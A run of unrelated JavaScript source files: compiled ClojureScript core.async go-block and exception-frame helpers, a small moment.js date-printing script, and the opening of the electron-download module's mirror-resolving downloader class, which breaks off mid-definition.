(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$async$impl$protocols$Handler$ = cljs.core.PROTOCOL_SENTINEL);

// A go-block callback handler can never be cancelled: always active.
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$async$impl$protocols$Handler$active_QMARK_$arity$1 = (function (_){
var self__ = this;
var ___$1 = this;
return true;
}));

(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$async$impl$protocols$Handler$blockable_QMARK_$arity$1 = (function (_){
var self__ = this;
var ___$1 = this;
return true;
}));

// Committing the operation hands back the wrapped callback.
(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.prototype.cljs$core$async$impl$protocols$Handler$commit$arity$1 = (function (_){
var self__ = this;
var ___$1 = this;
return self__.f;
}));

(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.getBasis = (function (){
return new cljs.core.PersistentVector(null, 2, 5, cljs.core.PersistentVector.EMPTY_NODE, [new cljs.core.Symbol(null,"f","f",43394975,null),new cljs.core.Symbol(null,"meta29375","meta29375",-1267248991,null)], null);
}));

(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.cljs$lang$type = true);

(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.cljs$lang$ctorStr = "cljs.core.async.impl.ioc-helpers/t_cljs$core$async$impl$ioc_helpers29374");

(cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374.cljs$lang$ctorPrWriter = (function (this__4428__auto__,writer__4429__auto__,opt__4430__auto__){
return cljs.core._write(writer__4429__auto__,"cljs.core.async.impl.ioc-helpers/t_cljs$core$async$impl$ioc_helpers29374");
}));

/**
 * Positional factory function for cljs.core.async.impl.ioc-helpers/t_cljs$core$async$impl$ioc_helpers29374.
 */
cljs.core.async.impl.ioc_helpers.__GT_t_cljs$core$async$impl$ioc_helpers29374 = (function cljs$core$async$impl$ioc_helpers$fn_handler_$___GT_t_cljs$core$async$impl$ioc_helpers29374(f__$1,meta29375){
return (new cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374(f__$1,meta29375));
});

}

return (new cljs.core.async.impl.ioc_helpers.t_cljs$core$async$impl$ioc_helpers29374(f,cljs.core.PersistentArrayMap.EMPTY));
});
// Advance the go-block machine one step: invoke the state-machine function
// stored at slot 0 (FN_IDX) with the state array itself.
cljs.core.async.impl.ioc_helpers.run_state_machine = (function cljs$core$async$impl$ioc_helpers$run_state_machine(state){
var fexpr__29397 = cljs.core.async.impl.ioc_helpers.aget_object(state,(0));
return (fexpr__29397.cljs$core$IFn$_invoke$arity$1 ? fexpr__29397.cljs$core$IFn$_invoke$arity$1(state) : fexpr__29397.call(null,state));
});
// Same as run_state_machine, but if the step throws, close the go block's
// return channel (slot 6, USER_START_IDX) before re-throwing so consumers
// are not left blocked forever.
cljs.core.async.impl.ioc_helpers.run_state_machine_wrapped = (function cljs$core$async$impl$ioc_helpers$run_state_machine_wrapped(state){
try{return cljs.core.async.impl.ioc_helpers.run_state_machine(state);
}catch (e29398){if((e29398 instanceof Object)){
var ex = e29398;
cljs.core.async.impl.ioc_helpers.aget_object(state,(6)).cljs$core$async$impl$protocols$Channel$close_BANG_$arity$1(null);

throw ex;
} else {
throw e29398;

}
}});
// Runtime support for a take (<!) inside a go block.  Registers a handler on
// channel c that, when a value arrives asynchronously, stores it in VALUE_IDX
// (slot 2), sets the continuation block blk in STATE_IDX (slot 1) and
// re-runs the machine.  If the take completes immediately the same slots are
// filled synchronously and :recur tells the trampoline to loop; returning
// null parks the machine until the callback fires.
cljs.core.async.impl.ioc_helpers.take_BANG_ = (function cljs$core$async$impl$ioc_helpers$take_BANG_(state,blk,c){
var temp__5733__auto__ = c.cljs$core$async$impl$protocols$ReadPort$take_BANG_$arity$2(null,cljs.core.async.impl.ioc_helpers.fn_handler((function (x){
var statearr_29405_29512 = state;
(statearr_29405_29512[(2)] = x);

(statearr_29405_29512[(1)] = blk);

return cljs.core.async.impl.ioc_helpers.run_state_machine_wrapped(state);
})));
if(cljs.core.truth_(temp__5733__auto__)){
var cb = temp__5733__auto__;
var statearr_29413_29517 = state;
(statearr_29413_29517[(2)] = cljs.core.deref(cb));

(statearr_29413_29517[(1)] = blk);

return new cljs.core.Keyword(null,"recur","recur",-437573268);
} else {
return null;
}
});
// Runtime support for a put (>!) inside a go block.  Mirrors take_BANG_:
// attempts the put on channel c; on asynchronous completion the callback
// stores the put's result in slot 2, the continuation block in slot 1 and
// re-runs the machine.  Immediate completion fills the slots synchronously
// and returns :recur; null parks the machine until the callback fires.
cljs.core.async.impl.ioc_helpers.put_BANG_ = (function cljs$core$async$impl$ioc_helpers$put_BANG_(state,blk,c,val){
var temp__5733__auto__ = c.cljs$core$async$impl$protocols$WritePort$put_BANG_$arity$3(null,val,cljs.core.async.impl.ioc_helpers.fn_handler((function (ret_val){
var statearr_29423_29521 = state;
(statearr_29423_29521[(2)] = ret_val);

(statearr_29423_29521[(1)] = blk);

return cljs.core.async.impl.ioc_helpers.run_state_machine_wrapped(state);
})));
if(cljs.core.truth_(temp__5733__auto__)){
var cb = temp__5733__auto__;
var statearr_29424_29522 = state;
(statearr_29424_29522[(2)] = cljs.core.deref(cb));

(statearr_29424_29522[(1)] = blk);

return new cljs.core.Keyword(null,"recur","recur",-437573268);
} else {
return null;
}
});
// Finish a go block: deliver its final value (unless nil -- channels cannot
// carry nil) onto the block's return channel stored in slot 6, then close
// the channel and return it.
cljs.core.async.impl.ioc_helpers.return_chan = (function cljs$core$async$impl$ioc_helpers$return_chan(state,value){
var c = (state[(6)]);
if((value == null)){
} else {
c.cljs$core$async$impl$protocols$WritePort$put_BANG_$arity$3(null,value,cljs.core.async.impl.ioc_helpers.fn_handler((function (){
return null;
})));
}

c.cljs$core$async$impl$protocols$Channel$close_BANG_$arity$1(null);

return c;
});
/**
* @constructor
* @implements {cljs.core.IRecord}
* @implements {cljs.core.IKVReduce}
* @implements {cljs.core.IEquiv}
* @implements {cljs.core.IHash}
* @implements {cljs.core.ICollection}
* @implements {cljs.core.ICounted}
* @implements {cljs.core.ISeqable}
* @implements {cljs.core.IMeta}
* @implements {cljs.core.ICloneable}
* @implements {cljs.core.IPrintWithWriter}
* @implements {cljs.core.IIterable}
* @implements {cljs.core.IWithMeta}
* @implements {cljs.core.IAssociative}
* @implements {cljs.core.IMap}
* @implements {cljs.core.ILookup}
*/
cljs.core.async.impl.ioc_helpers.ExceptionFrame = (function (catch_block,catch_exception,finally_block,continue_block,prev,__meta,__extmap,__hash){
this.catch_block = catch_block;
this.catch_exception = catch_exception;
this.finally_block = finally_block;
this.continue_block = continue_block;
this.prev = prev;
this.__meta = __meta;
this.__extmap = __extmap;
this.__hash = __hash;
this.cljs$lang$protocol_mask$partition0$ = 2230716170;
this.cljs$lang$protocol_mask$partition1$ = 139264;
});
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ILookup$_lookup$arity$2 = (function (this__4439__auto__,k__4440__auto__){
var self__ = this;
var this__4439__auto____$1 = this;
return this__4439__auto____$1.cljs$core$ILookup$_lookup$arity$3(null,k__4440__auto__,null);
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ILookup$_lookup$arity$3 = (function (this__4441__auto__,k29432,else__4442__auto__){
var self__ = this;
var this__4441__auto____$1 = this;
var G__29448 = k29432;
var G__29448__$1 = (((G__29448 instanceof cljs.core.Keyword))?G__29448.fqn:null);
switch (G__29448__$1) {
case "catch-block":
return self__.catch_block;
break;
case "catch-exception":
return self__.catch_exception;
break;
case "finally-block":
return self__.finally_block;
break;
case "continue-block":
return self__.continue_block;
break;
case "prev":
return self__.prev;
break;
default:
return cljs.core.get.cljs$core$IFn$_invoke$arity$3(self__.__extmap,k29432,else__4442__auto__);
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IKVReduce$_kv_reduce$arity$3 = (function (this__4458__auto__,f__4459__auto__,init__4460__auto__){
var self__ = this;
var this__4458__auto____$1 = this;
return cljs.core.reduce.cljs$core$IFn$_invoke$arity$3((function (ret__4461__auto__,p__29450){
var vec__29451 = p__29450;
var k__4462__auto__ = cljs.core.nth.cljs$core$IFn$_invoke$arity$3(vec__29451,(0),null);
var v__4463__auto__ = cljs.core.nth.cljs$core$IFn$_invoke$arity$3(vec__29451,(1),null);
return (f__4459__auto__.cljs$core$IFn$_invoke$arity$3 ? f__4459__auto__.cljs$core$IFn$_invoke$arity$3(ret__4461__auto__,k__4462__auto__,v__4463__auto__) : f__4459__auto__.call(null,ret__4461__auto__,k__4462__auto__,v__4463__auto__));
}),init__4460__auto__,this__4458__auto____$1);
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IPrintWithWriter$_pr_writer$arity$3 = (function (this__4453__auto__,writer__4454__auto__,opts__4455__auto__){
var self__ = this;
var this__4453__auto____$1 = this;
var pr_pair__4456__auto__ = (function (keyval__4457__auto__){
return cljs.core.pr_sequential_writer(writer__4454__auto__,cljs.core.pr_writer,""," ","",opts__4455__auto__,keyval__4457__auto__);
});
return cljs.core.pr_sequential_writer(writer__4454__auto__,pr_pair__4456__auto__,"#cljs.core.async.impl.ioc-helpers.ExceptionFrame{",", ","}",opts__4455__auto__,cljs.core.concat.cljs$core$IFn$_invoke$arity$2(new cljs.core.PersistentVector(null, 5, 5, cljs.core.PersistentVector.EMPTY_NODE, [(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),self__.catch_block],null)),(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),self__.catch_exception],null)),(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"finally-block","finally-block",832982472),self__.finally_block],null)),(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),self__.continue_block],null)),(new cljs.core.PersistentVector(null,2,(5),cljs.core.PersistentVector.EMPTY_NODE,[new cljs.core.Keyword(null,"prev","prev",-1597069226),self__.prev],null))], null),self__.__extmap));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IIterable$_iterator$arity$1 = (function (G__29431){
var self__ = this;
var G__29431__$1 = this;
return (new cljs.core.RecordIter((0),G__29431__$1,5,new cljs.core.PersistentVector(null, 5, 5, cljs.core.PersistentVector.EMPTY_NODE, [new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),new cljs.core.Keyword(null,"finally-block","finally-block",832982472),new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),new cljs.core.Keyword(null,"prev","prev",-1597069226)], null),(cljs.core.truth_(self__.__extmap)?cljs.core._iterator(self__.__extmap):cljs.core.nil_iter())));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IMeta$_meta$arity$1 = (function (this__4437__auto__){
var self__ = this;
var this__4437__auto____$1 = this;
return self__.__meta;
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ICloneable$_clone$arity$1 = (function (this__4434__auto__){
var self__ = this;
var this__4434__auto____$1 = this;
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,self__.__extmap,self__.__hash));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ICounted$_count$arity$1 = (function (this__4443__auto__){
var self__ = this;
var this__4443__auto____$1 = this;
return (5 + cljs.core.count(self__.__extmap));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IHash$_hash$arity$1 = (function (this__4435__auto__){
var self__ = this;
var this__4435__auto____$1 = this;
var h__4297__auto__ = self__.__hash;
if((!((h__4297__auto__ == null)))){
return h__4297__auto__;
} else {
var h__4297__auto____$1 = (function (coll__4436__auto__){
return (846900531 ^ cljs.core.hash_unordered_coll(coll__4436__auto__));
})(this__4435__auto____$1);
(self__.__hash = h__4297__auto____$1);
return h__4297__auto____$1;
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IEquiv$_equiv$arity$2 = (function (this29433,other29434){
var self__ = this;
var this29433__$1 = this;
return (((!((other29434 == null)))) && ((this29433__$1.constructor === other29434.constructor)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.catch_block,other29434.catch_block)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.catch_exception,other29434.catch_exception)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.finally_block,other29434.finally_block)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.continue_block,other29434.continue_block)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.prev,other29434.prev)) && (cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(this29433__$1.__extmap,other29434.__extmap)));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IMap$_dissoc$arity$2 = (function (this__4448__auto__,k__4449__auto__){
var self__ = this;
var this__4448__auto____$1 = this;
if(cljs.core.contains_QMARK_(new cljs.core.PersistentHashSet(null, new cljs.core.PersistentArrayMap(null, 5, [new cljs.core.Keyword(null,"finally-block","finally-block",832982472),null,new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),null,new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),null,new cljs.core.Keyword(null,"prev","prev",-1597069226),null,new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),null], null), null),k__4449__auto__)){
return cljs.core.dissoc.cljs$core$IFn$_invoke$arity$2(cljs.core._with_meta(cljs.core.into.cljs$core$IFn$_invoke$arity$2(cljs.core.PersistentArrayMap.EMPTY,this__4448__auto____$1),self__.__meta),k__4449__auto__);
} else {
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,cljs.core.not_empty(cljs.core.dissoc.cljs$core$IFn$_invoke$arity$2(self__.__extmap,k__4449__auto__)),null));
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IAssociative$_assoc$arity$3 = (function (this__4446__auto__,k__4447__auto__,G__29431){
var self__ = this;
var this__4446__auto____$1 = this;
var pred__29460 = cljs.core.keyword_identical_QMARK_;
var expr__29461 = k__4447__auto__;
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(G__29431,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,self__.__extmap,null));
} else {
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,G__29431,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,self__.__extmap,null));
} else {
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"finally-block","finally-block",832982472),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"finally-block","finally-block",832982472),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,G__29431,self__.continue_block,self__.prev,self__.__meta,self__.__extmap,null));
} else {
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,G__29431,self__.prev,self__.__meta,self__.__extmap,null));
} else {
if(cljs.core.truth_((pred__29460.cljs$core$IFn$_invoke$arity$2 ? pred__29460.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"prev","prev",-1597069226),expr__29461) : pred__29460.call(null,new cljs.core.Keyword(null,"prev","prev",-1597069226),expr__29461)))){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,G__29431,self__.__meta,self__.__extmap,null));
} else {
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,self__.__meta,cljs.core.assoc.cljs$core$IFn$_invoke$arity$3(self__.__extmap,k__4447__auto__,G__29431),null));
}
}
}
}
}
}));
// NOTE: Machine-generated JavaScript emitted by the ClojureScript compiler for
// cljs.core.async.impl.ioc-helpers (ExceptionFrame record protocol methods plus
// the go-block exception-handling machinery). Do not hand-edit; change the
// .cljs source and recompile instead.
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ISeqable$_seq$arity$1 = (function (this__4451__auto__){
var self__ = this;
var this__4451__auto____$1 = this;
return cljs.core.seq(cljs.core.concat.cljs$core$IFn$_invoke$arity$2(new cljs.core.PersistentVector(null, 5, 5, cljs.core.PersistentVector.EMPTY_NODE, [(new cljs.core.MapEntry(new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),self__.catch_block,null)),(new cljs.core.MapEntry(new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),self__.catch_exception,null)),(new cljs.core.MapEntry(new cljs.core.Keyword(null,"finally-block","finally-block",832982472),self__.finally_block,null)),(new cljs.core.MapEntry(new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),self__.continue_block,null)),(new cljs.core.MapEntry(new cljs.core.Keyword(null,"prev","prev",-1597069226),self__.prev,null))], null),self__.__extmap));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$IWithMeta$_with_meta$arity$2 = (function (this__4438__auto__,G__29431){
var self__ = this;
var this__4438__auto____$1 = this;
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(self__.catch_block,self__.catch_exception,self__.finally_block,self__.continue_block,self__.prev,G__29431,self__.__extmap,self__.__hash));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.prototype.cljs$core$ICollection$_conj$arity$2 = (function (this__4444__auto__,entry__4445__auto__){
var self__ = this;
var this__4444__auto____$1 = this;
if(cljs.core.vector_QMARK_(entry__4445__auto__)){
return this__4444__auto____$1.cljs$core$IAssociative$_assoc$arity$3(null,cljs.core._nth(entry__4445__auto__,(0)),cljs.core._nth(entry__4445__auto__,(1)));
} else {
return cljs.core.reduce.cljs$core$IFn$_invoke$arity$3(cljs.core._conj,this__4444__auto____$1,entry__4445__auto__);
}
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.getBasis = (function (){
return new cljs.core.PersistentVector(null, 5, 5, cljs.core.PersistentVector.EMPTY_NODE, [new cljs.core.Symbol(null,"catch-block","catch-block",-1479223021,null),cljs.core.with_meta(new cljs.core.Symbol(null,"catch-exception","catch-exception",-356775268,null),new cljs.core.PersistentArrayMap(null, 1, [new cljs.core.Keyword(null,"tag","tag",-1290361223),new cljs.core.Symbol(null,"Class","Class",2064526977,null)], null)),new cljs.core.Symbol(null,"finally-block","finally-block",-1821453297,null),new cljs.core.Symbol(null,"continue-block","continue-block",-211516323,null),new cljs.core.Symbol(null,"prev","prev",43462301,null)], null);
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.cljs$lang$type = true);
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.cljs$lang$ctorPrSeq = (function (this__4482__auto__){
return (new cljs.core.List(null,"cljs.core.async.impl.ioc-helpers/ExceptionFrame",null,(1),null));
}));
(cljs.core.async.impl.ioc_helpers.ExceptionFrame.cljs$lang$ctorPrWriter = (function (this__4482__auto__,writer__4483__auto__){
return cljs.core._write(writer__4483__auto__,"cljs.core.async.impl.ioc-helpers/ExceptionFrame");
}));
/**
 * Positional factory function for cljs.core.async.impl.ioc-helpers/ExceptionFrame.
 */
cljs.core.async.impl.ioc_helpers.__GT_ExceptionFrame = (function cljs$core$async$impl$ioc_helpers$__GT_ExceptionFrame(catch_block,catch_exception,finally_block,continue_block,prev){
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(catch_block,catch_exception,finally_block,continue_block,prev,null,null,null));
});
/**
 * Factory function for cljs.core.async.impl.ioc-helpers/ExceptionFrame, taking a map of keywords to field values.
 */
cljs.core.async.impl.ioc_helpers.map__GT_ExceptionFrame = (function cljs$core$async$impl$ioc_helpers$map__GT_ExceptionFrame(G__29435){
var extmap__4478__auto__ = (function (){var G__29477 = cljs.core.dissoc.cljs$core$IFn$_invoke$arity$variadic(G__29435,new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),cljs.core.prim_seq.cljs$core$IFn$_invoke$arity$2([new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),new cljs.core.Keyword(null,"finally-block","finally-block",832982472),new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850),new cljs.core.Keyword(null,"prev","prev",-1597069226)], 0));
if(cljs.core.record_QMARK_(G__29435)){
return cljs.core.into.cljs$core$IFn$_invoke$arity$2(cljs.core.PersistentArrayMap.EMPTY,G__29477);
} else {
return G__29477;
}
})();
return (new cljs.core.async.impl.ioc_helpers.ExceptionFrame(new cljs.core.Keyword(null,"catch-block","catch-block",1175212748).cljs$core$IFn$_invoke$arity$1(G__29435),new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795).cljs$core$IFn$_invoke$arity$1(G__29435),new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(G__29435),new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850).cljs$core$IFn$_invoke$arity$1(G__29435),new cljs.core.Keyword(null,"prev","prev",-1597069226).cljs$core$IFn$_invoke$arity$1(G__29435),null,cljs.core.not_empty(extmap__4478__auto__),null));
});
// Pushes a new ExceptionFrame onto the frame stack kept in state-array slot 4,
// linking the previous top frame via the `prev` field.
cljs.core.async.impl.ioc_helpers.add_exception_frame = (function cljs$core$async$impl$ioc_helpers$add_exception_frame(state,catch_block,catch_exception,finally_block,continue_block){
var statearr_29478 = state;
(statearr_29478[(4)] = cljs.core.async.impl.ioc_helpers.__GT_ExceptionFrame(catch_block,catch_exception,finally_block,continue_block,cljs.core.async.impl.ioc_helpers.aget_object(state,(4))));
return statearr_29478;
});
// Walks the ExceptionFrame stack (state slot 4), dispatching the pending
// exception (state slot 5) to a matching catch block, running finally blocks,
// popping exhausted frames, or rethrowing when no frame remains.
cljs.core.async.impl.ioc_helpers.process_exception = (function cljs$core$async$impl$ioc_helpers$process_exception(state){
while(true){
var exception_frame = cljs.core.async.impl.ioc_helpers.aget_object(state,(4));
var catch_block = new cljs.core.Keyword(null,"catch-block","catch-block",1175212748).cljs$core$IFn$_invoke$arity$1(exception_frame);
var catch_exception = new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795).cljs$core$IFn$_invoke$arity$1(exception_frame);
var exception = cljs.core.async.impl.ioc_helpers.aget_object(state,(5));
if(cljs.core.truth_((function (){var and__4174__auto__ = exception;
if(cljs.core.truth_(and__4174__auto__)){
return cljs.core.not(exception_frame);
} else {
return and__4174__auto__;
}
})())){
throw exception;
} else {
if(cljs.core.truth_((function (){var and__4174__auto__ = exception;
if(cljs.core.truth_(and__4174__auto__)){
var and__4174__auto____$1 = catch_block;
if(cljs.core.truth_(and__4174__auto____$1)){
return ((cljs.core._EQ_.cljs$core$IFn$_invoke$arity$2(new cljs.core.Keyword(null,"default","default",-1987822328),catch_exception)) || ((exception instanceof catch_exception)));
} else {
return and__4174__auto____$1;
}
} else {
return and__4174__auto__;
}
})())){
var statearr_29486 = state;
(statearr_29486[(1)] = catch_block);
(statearr_29486[(2)] = exception);
(statearr_29486[(5)] = null);
(statearr_29486[(4)] = cljs.core.assoc.cljs$core$IFn$_invoke$arity$variadic(exception_frame,new cljs.core.Keyword(null,"catch-block","catch-block",1175212748),null,cljs.core.prim_seq.cljs$core$IFn$_invoke$arity$2([new cljs.core.Keyword(null,"catch-exception","catch-exception",-1997306795),null], 0)));
return statearr_29486;
} else {
if(cljs.core.truth_((function (){var and__4174__auto__ = exception;
if(cljs.core.truth_(and__4174__auto__)){
return ((cljs.core.not(catch_block)) && (cljs.core.not(new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame))));
} else {
return and__4174__auto__;
}
})())){
var statearr_29487_29619 = state;
(statearr_29487_29619[(4)] = new cljs.core.Keyword(null,"prev","prev",-1597069226).cljs$core$IFn$_invoke$arity$1(exception_frame));
var G__29621 = state;
state = G__29621;
continue;
} else {
if(cljs.core.truth_((function (){var and__4174__auto__ = exception;
if(cljs.core.truth_(and__4174__auto__)){
if(cljs.core.not(catch_block)){
return new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame);
} else {
return false;
}
} else {
return and__4174__auto__;
}
})())){
var statearr_29488 = state;
(statearr_29488[(1)] = new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame));
(statearr_29488[(4)] = cljs.core.assoc.cljs$core$IFn$_invoke$arity$3(exception_frame,new cljs.core.Keyword(null,"finally-block","finally-block",832982472),null));
return statearr_29488;
} else {
if(cljs.core.truth_(((cljs.core.not(exception))?new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame):false))){
var statearr_29489 = state;
(statearr_29489[(1)] = new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame));
(statearr_29489[(4)] = cljs.core.assoc.cljs$core$IFn$_invoke$arity$3(exception_frame,new cljs.core.Keyword(null,"finally-block","finally-block",832982472),null));
return statearr_29489;
} else {
if(((cljs.core.not(exception)) && (cljs.core.not(new cljs.core.Keyword(null,"finally-block","finally-block",832982472).cljs$core$IFn$_invoke$arity$1(exception_frame))))){
var statearr_29490 = state;
(statearr_29490[(1)] = new cljs.core.Keyword(null,"continue-block","continue-block",-1852047850).cljs$core$IFn$_invoke$arity$1(exception_frame));
(statearr_29490[(4)] = new cljs.core.Keyword(null,"prev","prev",-1597069226).cljs$core$IFn$_invoke$arity$1(exception_frame));
return statearr_29490;
} else {
throw (new Error("No matching clause"));
}
}
}
}
}
}
break;
}
});
//# sourceMappingURL=cljs.core.async.impl.ioc_helpers.js.map
|
/**
 * Created by yan on 15-7-6.
 * Writes the current date and time, localized to Simplified Chinese, into the page.
 */
var moment = require('moment');
var localizedNow = moment().locale('zh-cn');
document.write(localizedNow.format('LLLL'));
|
'use strict'
const arch = require('./arch')
const debug = require('debug')('electron-download')
const envPaths = require('env-paths')
const fs = require('fs-extra')
const rc = require('rc')
const nugget = require('nugget')
const os = require('os')
const path = require('path')
const pathExists = require('path-exists')
const semver = require('semver')
const sumchecker = require('sumchecker')
/**
 * Downloads Electron release artifacts (electron, chromedriver, mksnapshot,
 * ffmpeg, symbols or dsym zips) into a local cache directory, verifying them
 * against the published SHASUMS256.txt checksums when applicable.
 *
 * Mirror/location settings are resolved in priority order from NPM config env
 * vars, npm package-config env vars, plain env vars, then constructor options.
 */
class ElectronDownloader {
  /**
   * @param {Object} opts - version, platform, arch, cache, mirror, force,
   *   autoDownload (default true), plus artifact flags (chromedriver, ...).
   * @throws {Error} when `force` is set while `autoDownload` is disabled —
   *   a forced re-download is impossible without downloading.
   */
  constructor (opts) {
    this.opts = Object.assign({ autoDownload: true }, opts)
    if (this.opts.force && !this.opts.autoDownload) {
      throw new Error('force and autoDownload options are incompatible for Electron Download')
    }
    // npm configuration (proxy, strict-ssl); best-effort, failures are logged.
    this.npmrc = {}
    try {
      rc('npm', this.npmrc)
    } catch (error) {
      console.error(`Error reading npm configuration: ${error.message}`)
    }
  }

  // Base download URL; nightly builds live in a separate GitHub releases repo.
  get baseUrl () {
    if (this.version.indexOf('nightly') !== -1) {
      return process.env.NPM_CONFIG_ELECTRON_NIGHTLY_MIRROR ||
        process.env.npm_config_electron_nightly_mirror ||
        process.env.npm_package_config_electron_nightly_mirror ||
        process.env.ELECTRON_NIGHTLY_MIRROR ||
        this.opts.nightly_mirror ||
        'https://github.com/electron/nightlies/releases/download/v'
    }
    return process.env.NPM_CONFIG_ELECTRON_MIRROR ||
      process.env.npm_config_electron_mirror ||
      process.env.npm_package_config_electron_mirror ||
      process.env.ELECTRON_MIRROR ||
      this.opts.mirror ||
      'https://github.com/electron/electron/releases/download/v'
  }

  // Middle path segment of the download URL (defaults to the version).
  get middleUrl () {
